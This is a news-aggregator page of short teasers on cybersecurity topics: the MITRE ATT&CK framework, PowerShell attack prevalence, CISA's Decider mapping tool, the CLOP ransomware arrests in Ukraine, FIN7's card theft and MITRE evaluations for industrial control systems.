Collaborate Disseminate
A malware tactic dubbed ‘hunter-killer’ is growing, based on an analysis of more than 600,000 malware samples. This may become the standard approach for advanced attacks.
The post Hunter-Killer Malware Tactic Growing: Stealthy, Persistent and Aggressiv… Continue reading Hunter-Killer Malware Tactic Growing: Stealthy, Persistent and Aggressive
A malware tactic dubbed ‘hunter-killer’ is growing, based on an analysis of more than 600,000 malware samples. This may become the standard approach for advanced attacks.
The post Hunter-Killer Malware Tactic Growing: Stealthy, Persistent and Aggressiv… Continue reading Hunter-Killer Malware Tactic Growing: Stealthy, Persistent and Aggressive
How do cyber pros prioritize their security efforts? A good place to start is knowing exactly what tactics, techniques and procedures (TTP) threat actors use. In a recently published report, aggregated data was used to identify the most common attack techniques as defined by the MITRE ATT&CK framework. The study revealed that PowerShell Command & […]
The post All About PowerShell Attacks: The No. 1 ATT&CK Technique appeared first on Security Intelligence.
Continue reading All About PowerShell Attacks: The No. 1 ATT&CK Technique
CISA has released a free and open source tool that makes it easier to map an attacker’s TTPs to the Mitre ATT&CK framework.
The post New CISA Tool ‘Decider’ Maps Attacker Behavior to ATT&CK Framework appeared first on SecurityWeek.
Continue reading New CISA Tool ‘Decider’ Maps Attacker Behavior to ATT&CK Framework
A challenge in industrial control systems (ICS) cybersecurity is the lack of detection and collection capability within most ICS environments. Security leaders can struggle to piece together the complete attack chain in actual ICS incidents because the environments cannot collect the required evidence. A new report, “2021 MITRE Engenuity ATT&CK Evaluations for ICS,” produced by Dragos, evaluates the ICS threat detection market and shows a realistic demonstration of an attack against an operational technology environment. This report details the purpose of the ATT&CK evaluations for ICS and the lessons learned from the evaluation results, including: How the MITRE ATT&CK for ICS framework was developed A breakdown of the ATT&CK Evaluations for the ICS scenario, including the emulated attack approach and the ICS environment The ATT&CK Evals results and how Dragos performed Benefits to the ICS cybersecurity community Learn more on the ATT&CK Evaluations and how to accelerate digital transformation securely to manage growing risks to protect core business operations. This article was produced by CyberScoop […]
The post How to improve threat detection in ICS environments appeared first on CyberScoop.
Continue reading How to improve threat detection in ICS environments
Authorities in Ukraine this week charged six people alleged to have been part of the CLOP ransomware group, a cybercriminal gang said to have extorted more than half a billion dollars from victims. Some of CLOP’s victims this year alone include Stanford University Medical School, the University of California, and University of Maryland. Continue reading Ukrainian Police Nab Six Tied to CLOP Ransomware
MITRE ATT&CK stands for MITRE Adversarial Tactics, Techniques and Common Knowledge. It’s a curated knowledge base of adversarial behavior based on real-world observation of APT campaigns. The original impetus for the project was to answer the quest… Continue reading 5 Things to Do with MITRE ATT&CK – Tips and Tricks Special
Not all attackers are trying to exfiltrate data. In security, we’re all familiar with CIA triad—confidentiality, availability, and integrity. While Exfiltration describes adversarial behavior with the goal of violating confidentiality, atta… Continue reading The MITRE ATT&CK Framework: Impact
The Eastern European hacking group FIN7 has stolen an estimated $1 billion in recent years by sweeping up payment card data processed by hotels and other organizations. The fortune amassed by FIN7, despite the arrest of some of its senior members, has made it one of the most potent criminal threats to organizations around the world. Changes the group has made to its hacking tools in recent months have meant more breaches, and likely more money, for FIN7. Now, a U.S. government-funded organization is trying to put a dent in FIN7 hacks by evaluating the group’s attack techniques against widely used cybersecurity software. Vendors will be assessed on their ability to block FIN7-like intrusions and, with the results made public next year, hopefully improve their products. While FIN7 is the subject of the evaluation, the attack techniques tested will “be applicable across a broad spectrum of adversaries,” said Frank Duff, […]
The post Can software vendors block a notorious criminal group’s attacks? MITRE wants to find out appeared first on CyberScoop.
A document that cybersecurity professionals consult in analyzing hacking groups will soon expand to include attack techniques used against industrial control systems, a recognition of the growing number of adversaries that target critical infrastructure. The goal is to help organizations understand and defend against disruptive cyberattacks like the one that cut power for some 225,000 people in Ukraine in 2015. That means filling in gaps in the cybersecurity community’s knowledge base of the hacking methods that are unique to industrial environments as well as those that also apply to IT networks. The document, known as the “ATT&CK” framework, should account for the “full gamut of adversary behavior,” said Otis Alexander, one of the lead cybersecurity engineers who helps maintain it at MITRE Corp., a federally funded not-for-profit organization. The updated framework could be available to network defenders as soon as December. It will cover attacks against ICS protocols and ways in which hackers might hinder incident response, Alexander said at MITRE’s ATT&CKcon conference […]
The post How would MITRE’s popular cyberattack framework apply to industrial control systems? appeared first on CyberScoop.